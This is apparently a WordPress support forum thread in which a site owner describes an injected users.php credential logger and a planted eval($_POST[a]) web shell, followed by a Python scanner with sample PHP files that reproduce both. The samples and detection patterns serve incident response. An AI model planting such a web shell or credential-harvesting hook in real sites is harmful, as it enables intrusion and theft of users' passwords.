• Expires on 4/22/2013:
    http://pastebin.com/embed_iframe.php?i=VVUhU9qF

    This code was injected into my users.php file on or around Feb 22. I was informed by my host about a week later, but unsatisfactorily, I only discovered the injection portion today. It records the server name, username, password, and IP address. Failures go to one log file, successful IPs to another. The failed password attempts log is cleaned weekly and the other doesn’t seem to be cleared ever.

    There’s an interesting bit: First, it checks if it has the current IP as a success already. If so, it sets UserOk to True. If the failure log contains more than 4 failed attempts from the IP address AND UserOk is False, then he sets a specific password. If this password works, then he phones home, twice.

    I think this is so that the hacker can hit the login script at leisure without having to log back in.

    Here’s what I want to confirm: It seems to be phoning passwords home both to a script and to an email address. If so, I need to contact my users and warn them to change their passwords.

    Can you help me confirm that?
    Also, can you forward this to the relevant security gurus?

    ——

    Okay, here’s the dangerous part. Additionally, a file, /wp-admin/wp-class.php was created. This script did nothing but eval($_POST[a]). Clearly dangerous. So, I think we were also set up to be part of a bot net. Thoughts?

    Thank you,

    ~ Shawn
    PS: I’m not sure what version of WordPress we were on when hacked. We’re now on 3.5.1.
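The two artifacts described in the post (a one-line eval($_POST[...]) web shell, and a login hook that reads the submitted credentials and both writes them to a log and sends them off-site) are the kind of thing a quick tree scan can surface before a host notices. The following is an added example, not code from the post and not the injected script behind the pastebin link: a Python scanner whose regexes are my own heuristics for those two patterns. The sample WordPress tree it builds is constructed inline (the file names, the toy PHP bodies and the hypothetical mail address are all made up) so the example runs offline.

```python
import pathlib
import re
import tempfile

# Heuristic 1: eval() fed directly from a request variable, the classic
# one-line web shell ("eval($_POST[a])" in the post).
EVAL_OF_REQUEST = re.compile(
    r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)

# Heuristic 2: eval() over an obfuscated payload.
EVAL_OBFUSCATED = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)

# Heuristic 3 needs BOTH halves in the same file: it reads the WordPress
# login fields (the real form field names are "log" and "pwd") AND it
# writes or sends data somewhere. wp-login.php legitimately reads the
# fields, so the capture regex alone would be a false positive.
CAPTURE = re.compile(
    r"\$_POST\s*\[\s*['\"]?(?:log|pwd|user_login|user_pass)['\"]?\s*\]", re.I)
EXFIL = re.compile(
    r"\b(?:mail|curl_exec|fsockopen|file_get_contents|file_put_contents|fwrite)\s*\(", re.I)

RULES = [
    ("eval-of-request", EVAL_OF_REQUEST),
    ("eval-obfuscated", EVAL_OBFUSCATED),
]


def scan_file(path: pathlib.Path) -> list[str]:
    """Return the names of every heuristic that fires on one PHP file."""
    text = path.read_text(errors="replace")
    hits = [name for name, rx in RULES if rx.search(text)]
    if CAPTURE.search(text) and EXFIL.search(text):
        hits.append("credential-capture-and-exfil")
    return hits


def scan_tree(root) -> dict[str, list[str]]:
    """Walk every *.php file under root; map relative path -> rule names."""
    root = pathlib.Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_file(path)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample tree (not real WordPress code): one web shell, one
# credential logger in the spirit of the post, one legitimate-looking
# login handler, one clean plugin file.
SAMPLE_FILES = {
    "wp-admin/wp-class.php": "<?php eval($_POST[a]); ?>\n",
    "wp-admin/users.php": (
        "<?php\n"
        "$line = $_SERVER['SERVER_NAME'].'|'.$_POST['log'].'|'.$_POST['pwd']\n"
        "      .'|'.$_SERVER['REMOTE_ADDR'];\n"
        "file_put_contents('/tmp/.ok.log', $line, FILE_APPEND);\n"
        "mail('drop@example.invalid', 'creds', $line);  // hypothetical address\n"
    ),
    "wp-login.php": (
        "<?php\n"
        "$user = wp_signon(array('user_login' => $_POST['log'],\n"
        "                        'user_password' => $_POST['pwd']));\n"
    ),
    "wp-content/plugins/hello/hello.php": "<?php function hello() { echo 'hi'; }\n",
}


def build_sample_tree() -> pathlib.Path:
    """Write SAMPLE_FILES into a fresh temp directory and return its root."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="wpscan_"))
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real install with `scan_tree("/var/www/html")`; the wp-login.php sample is there to show that reading the login fields alone is not flagged, only reading them together with a write or send call is. Heuristics like these find the obvious cases only; on a site that has already been compromised, compare the tree against clean core files (for example with WP-CLI's `wp core verify-checksums`) and assume any password submitted while the hook was live is known to the attacker.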

  • The topic ‘users.php hack, do I need to warn my users?’ is closed to new replies.